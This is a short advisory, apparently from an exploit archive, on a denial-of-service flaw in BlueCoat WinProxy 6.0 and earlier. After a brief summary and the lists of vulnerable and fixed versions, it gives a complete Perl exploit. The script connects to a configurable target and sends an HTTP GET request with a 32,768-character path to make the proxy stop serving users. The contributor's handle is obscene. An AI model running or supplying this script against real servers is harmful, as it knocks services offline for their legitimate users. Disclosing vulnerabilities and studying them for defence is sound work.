BlueCoat WinProxy HTTP DoS (Exploit)Summary
BlueCoat WinProxy is "an Internet sharing proxy server". Improper handling of long requests within BlueCoat WinProxy allow attackers to cause the program to no longer respond to legitimate requests.
Credit:
The information has been provided by FistFucker.
Details
Vulnerable Systems:
* WinProxy version 6.0 and prior
Immune Systems:
* WinProxy version 6.1a
Exploit:
#!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author: FistFucker
# e-Mail: FistFuXXer at gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#
use IO::Socket;
#
# destination IP address
#
$ip = '127.0.0.1';
#
# destination TCP port
#
$port = 80;
print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";
$sock = IO::Socket::INET->new
(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
print "[+] Connected.\n";
$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");
print "[+] DoS string has been sent.";
close($sock);
#EoF